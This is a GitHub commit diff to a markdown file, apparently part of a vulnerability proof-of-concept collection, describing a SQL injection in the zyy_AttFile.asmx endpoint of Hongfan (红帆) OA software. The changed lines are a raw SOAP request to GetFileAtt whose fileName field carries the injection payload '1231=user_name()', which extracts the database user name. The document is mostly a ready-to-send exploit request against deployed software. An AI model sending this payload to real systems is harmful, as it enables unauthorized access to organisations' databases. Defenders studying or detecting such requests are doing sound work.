Update 红帆OA zyy_AttFile.asmx SQL注入漏洞.md

This commit is contained in:
wy876 2023-12-12 20:22:28 +08:00 committed by GitHub
parent fabbae97f8
commit 7de83d7423
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -9,10 +9,11 @@ Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetFileAtt" Soapaction: "http://tempuri.org/GetFileAtt"
Accept-Encoding: gzip, deflate Accept-Encoding: gzip, deflate
Connection: close Connection: close
<?xml version="1.0" encoding="utf-8"?><soap:Envelope <?xml version="1.0" encoding="utf-8"?><soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so xmlns="http://tempuri.org/"><fileName>1231=user_name()</fileName></GetFileAtt> </soap:Body></so
ap:Envelope> ap:Envelope>
``` ```